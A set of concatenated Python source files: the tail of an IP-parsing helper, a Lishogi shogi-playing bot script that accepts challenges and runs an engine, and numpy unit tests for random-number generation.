_logger.info("IP: %s" % IP)
return IP
def getIPfromIfconfig(self,string):
s = string[string.find("inet addr:")+10:]
s = s[0:s.find(" ")]
return s
|
lishogi-bot.py | import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError, ReadTimeout
from urllib3.exceptions import ProtocolError
from ColorLogger import enable_color_logging
from util import *
import copy
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.6.0"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
else:
control_queue.put_nowait({"type": "ping"})
except:
pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
manager = multiprocessing.Manager()
challenge_queue = manager.list()
control_queue = manager.Queue()
control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li])
control_stream.start()
busy_processes = 0
queued_processes = 0
with logging_pool.LoggingPool(max_games+1) as pool:
while not terminated:
event = control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "local_game_done":
busy_processes -= 1
logger.info("+++ Process Free. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
elif event["type"] == "challenge":
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
challenge_queue.append(chlng)
if (challenge_config.get("sort_by", "best") == "best"):
list_c = list(challenge_queue)
list_c.sort(key=lambda c: -c.score())
challenge_queue = list_c
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except:
pass
elif event["type"] == "gameStart":
if queued_processes <= 0:
logger.debug("Something went wrong. Game is starting and we don't have a queued process")
else:
queued_processes -= 1
busy_processes += 1
logger.info("--- Process Used. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
game_id = event["game"]["id"]
pool.apply_async(play_game, [li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue])
while ((queued_processes + busy_processes) < max_games and challenge_queue): # keep processing the queue until empty or max_games is reached
chlng = challenge_queue.pop(0)
try:
logger.info(" Accept {}".format(chlng))
queued_processes += 1
response = li.accept_challenge(chlng.id)
logger.info("--- Process Queue. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
queued_processes -= 1
control_queue.task_done()
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
#Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
engine = engine_factory(board)
engine.get_opponent_info(game)
conversation = Conversation(game, engine, li, __version__, challenge_queue)
logger.info("+++ {}".format(game))
engine_cfg = config["engine"]
is_usi = engine_cfg["protocol"] == "usi"
is_usi_ponder = is_usi and engine_cfg.get("ponder", False)
move_overhead = config.get("move_overhead", 1000)
polyglot_cfg = engine_cfg.get("polyglot", {})
book_cfg = polyglot_cfg.get("book", {})
ponder_thread = None
deferredFirstMove = False
ponder_usi = None
def ponder_thread_func(game, engine, board, wtime, btime, winc, binc):
global ponder_results
best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, winc, binc, True)
ponder_results[game.id] = ( best_move , ponder_move )
engine.set_time_control(game)
if len(board.move_stack) < 2:
while not terminated:
try:
if not play_first_move(game, engine, board, li):
deferredFirstMove = True
break
except (HTTPError) as exception:
if exception.response.status_code == 400: # fallthrough
break
else:
moves = game.state["moves"].split()
if not is_game_over(game) and is_engine_move(game, moves):
best_move = None
ponder_move = None
wtime = game.state["wtime"]
btime = game.state["btime"]
if board.turn == shogi.BLACK:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, game.state["winc"], game.state["binc"])
engine.print_stats()
if is_usi_ponder and not ( ponder_move is None ):
ponder_board = copy.deepcopy(board)
ponder_board.push(shogi.Move.from_usi(best_move))
ponder_board.push(shogi.Move.from_usi(ponder_move))
ponder_usi = ponder_move
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, game.state["winc"], game.state["binc"]))
ponder_thread.start()
li.make_move(game.id, best_move)
while not terminated:
try:
binary_chunk = next(lines)
except(StopIteration):
break
try:
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if u_type == "chatLine":
conversation.react(ChatLine(upd), game)
elif u_type == "gameState":
game.state = upd
moves = upd["moves"].split()
if len(moves) > 0 and len(moves) != len(board.move_stack):
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
if config.get("fake_think_time") and len(moves) > 9:
delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015
accel = 1 - max(0, min(100, len(moves) - 20)) / 150
sleep = min(5, delay * accel)
time.sleep(sleep)
best_move = None
ponder_move = None
wtime = upd["wtime"]
btime = upd["btime"]
if board.turn == shogi.BLACK:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if not deferredFirstMove:
if best_move == None:
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, upd["winc"], upd["binc"])
engine.print_stats()
if is_usi_ponder and not ( ponder_move is None ):
ponder_board = copy.deepcopy(board)
ponder_board.push(shogi.Move.from_usi(best_move))
ponder_board.push(shogi.Move.from_usi(ponder_move))
ponder_usi = ponder_move
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, upd["winc"], upd["binc"]))
ponder_thread.start()
li.make_move(game.id, best_move)
else:
play_first_move(game, engine, board, li)
deferredFirstMove = False
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
except (HTTPError, ReadTimeout, RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as e:
if game.id in (ongoing_game["gameId"] for ongoing_game in li.get_ongoing_games()):
continue
else:
break
logger.info("--- {} Game over".format(game.url()))
engine.stop()
if not ( ponder_thread is None ):
ponder_thread.join()
ponder_thread = None
# This can raise queue.NoFull, but that should only happen if we're not processing
# events fast enough and in this case I believe the exception should be raised
control_queue.put_nowait({"type": "local_game_done"})
def play_first_move(game, engine, board, li):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
# need to hardcode first movetime since Lishogi has 30 sec limit.
best_move = engine.first_search(board, 1000)
engine.print_stats()
li.make_move(game.id, best_move)
return True
return False
def play_first_book_move(game, engine, board, li, config):
pass
def get_book_move(board, config):
pass
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO)
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if args.u is True and is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
test_random.py | import warnings
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
class TestSeed:
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState,
np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
def test_multidimensional_pvals(self):
assert_raises(ValueError, np.random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, np.random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, np.random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, np.random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestSetState:
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint:
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a sha256 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '509aea74d792fb931784c4b0135392c65aec64beee12b0cc167548a2c3d31e71',
'int16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'int32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'int64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'int8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404',
'uint16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'uint32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'uint64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'uint8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.sha256(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.sha256(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random(self):
np.random.seed(self.seed)
actual = np.random.random((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(np.random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(np.random.randint(0, -10, size=0).shape, (0,))
assert_equal(np.random.randint(10, 10, size=0).shape, (0,))
assert_equal(np.random.choice(0, size=0).shape, (0,))
assert_equal(np.random.choice([], size=(0,)).shape, (0,))
assert_equal(np.random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, np.random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, np.random.choice, a, p=p)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object), ("b", np.int32)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
